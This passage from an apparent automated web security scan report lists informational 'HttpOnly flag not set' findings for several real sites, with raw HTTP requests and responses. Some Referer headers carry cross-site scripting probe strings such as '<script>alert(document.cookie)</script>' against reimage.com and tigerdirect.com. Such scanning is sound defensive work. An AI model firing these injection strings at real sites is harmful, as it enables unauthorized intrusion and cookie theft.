Proxy-Connection: keep-alive
Referer: http://wbenedetti.newsvine.com/?2efa1%22-alert(1)-%22fb67b00e4a1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=45f73cc22cc66ac775a363e022c73cd5

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:20:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:20:53 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:20:53 GMT
Content-Length: 383
Content-Type: text/javascript


var globalPokeURL = 'http://log.newsvine.com/poke.gif';
var globalImgRoot = 'http://www.newsvine.com/_vine/images/_/';
var globalRegisterRoot = 'https://www.newsvine.com/_nv/accounts/register';
v
...[SNIP]...

17.480. https://www.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.newsvine.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; vid=d22bc33559f8a0701e021885c03ad2c9; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:02:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Keep-Alive: timeout=3, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 56108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

17.481. https://www.newsvine.com/_action/user/logout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_action/user/logout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 03:20:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a518bd3650bb791008fc921ee62dad0e; expires=Sat, 25-Jan-2031 03:20:10 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 03:20:14 GMT; path=/; domain=.newsvine.com
Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F1272465988
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


17.482. https://www.newsvine.com/_nv/accounts/global/information

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/global/information

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/global/information HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:51 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3baaa49edd0123eafe283532e331e3c0; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/accountSettingsLogin?tab=global&item=information&redirect=https%3A%2F%2Fwww.newsvine.com%2F_nv%2Faccounts%2Fglobal%2Finformation
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


17.483. https://www.newsvine.com/_nv/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:45 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

17.484. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/emailAlerts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


17.485. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/newsletters

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/newsletters HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:00 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...

17.486. https://www.newsvine.com/_nv/accounts/register

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/register

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/register HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 11769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

17.487. https://www.newsvine.com/_nv/api/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/api/accounts/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:51 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:51 GMT
Vary: Accept-Encoding
Content-Length: 97
Content-Type: application/json
Connection: close

{"data":{"errors":{"L2":"Please enter your email address and password."}},"statusCode":"failure"}

17.488. https://www.newsvine.com/_nv/api/accounts/resetPassword

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/api/accounts/resetPassword

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/resetPassword HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:02 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 03:15:02 GMT
Vary: Accept-Encoding
Content-Length: 100
Content-Type: application/json
Connection: close

{"data":{"errors":{"RP1":"Please enter your email address or domain name."}},"statusCode":"failure"}

17.489. http://www.omniture.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 23:23:55 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

17.490. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outblush.com
Path:   /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.outblush.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 11007
Date: Sun, 30 Jan 2011 02:01:00 GMT
Age: 0
Connection: close
Server: IBSrv 1.0
Set-Cookie: BIGipServerbargainist_POOL=1509626028.52514.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...

17.491. http://www.reimage.com/track_new/track.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reimage.com
Path:   /track_new/track.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_new/track.php?tracking=Neudesic69f18 HTTP/1.1
Host: www.reimage.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tr00qdoq010dhkbjc6ke2ogs54; _language=english

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:28:32 GMT
Server:
P3P: CP="CAO DSP AND SO ON" policyref="/w3c/p3p.xml"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: _tracking=Neudesic69f18; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _campaign=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _adgroup=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _keyword=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _ads=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _visit=1; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Pragma: no-cache
Set-Cookie: _trackid=12484382; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _visitnum=1; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 0


17.492. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:03:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:25 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:03:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40283


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 7]><![endif]-->
<!--[if lt IE 7]><![endif]-->
<html xmlns="http://
...[SNIP]...

17.493. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.terra.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:03:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Status: 404 Not Found
Location: http://buscador.terra.com/404.aspx?ca=z&query=$%7Cwww&source=Search&curl=http://www.terra.com/$%7Cwww.people.com/$%7Chttp:/www.walmart.com/%7Chttp:/www.walmart.com/cp/toys/4171%7Chttp:/www.walmart.com/cp/Electronics/3944
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296353013.43280; path=/; expires=Fri, 01-Jan-2016 00:02:15 GMT; domain=.terra.com
Connection: close


17.494. http://www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com.mx
Path:   /default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.terra.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:03:40 GMT
Server: Microsoft-IIS/6.0
cache-control: no-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://buscador.terra.com.mx/404.aspx?ca=z&source=Search&query=default.htm%257Chttp%3a+www.terra.com+%24%257Cwww.people.com+%24%257Chttp%3a+www.walmart.com+%257Chttp%3a+www.walmart.com+cp+toys+4171%257Chttp%3a+www.walmart&curl=http%3a%2f%2fwww.terra.com.mx%2fdefault.htm%257Chttp%3a%2fwww.terra.com%2f%24%257Cwww.people.com%2f%24%257Chttp%3a%2fwww.walmart.com%2f%257Chttp%3a%2fwww.walmart.com%2fcp%2ftoys%2f4171%257Chttp%3a%2fwww.walmart.com%2fcp%2fElectronics%2f3944
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 592
Set-Cookie: CookiePortalMX=233854160.20480.0000; expires=Sun, 30-Jan-2011 04:03:40 GMT; path=/

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://buscador.terra.com.mx/404.aspx?ca=z&amp;source=Search&amp;query=default.htm%257Chttp%3a+www.terra.com+%24%257Cww
...[SNIP]...

17.495. http://www.theworkbuzz.com/employment-trends/video-interviews/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theworkbuzz.com
Path:   /employment-trends/video-interviews/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /employment-trends/video-interviews/ HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sat, 29 Jan 2011 23:55:31 GMT
Expires: Sun, 30 Jan 2011 00:00:31 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-caklakng=BFF43994C5529A7F9B0AC690658AAD29; path=/
Last-Modified: Sat, 29 Jan 2011 16:33:17 GMT
Content-Length: 49242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...

17.496. http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theworkbuzz.com
Path:   /fun-stuff/your-work-soundtrack/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fun-stuff/your-work-soundtrack/ HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sat, 29 Jan 2011 23:55:40 GMT
Expires: Sun, 30 Jan 2011 00:00:40 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-caklakng=46B1EFBB3B916447A34716FB66E1BFF9; path=/
Last-Modified: Sat, 29 Jan 2011 08:48:16 GMT
Content-Length: 47386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...

17.497. http://www.tigerdirect.com/cgi-bin/icart.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /cgi-bin/icart.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/icart.asp HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; SRVR=WEBX10%2D07A; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SRCCODE=WEB1101; SSLB=0

Response

HTTP/1.1 200 OK
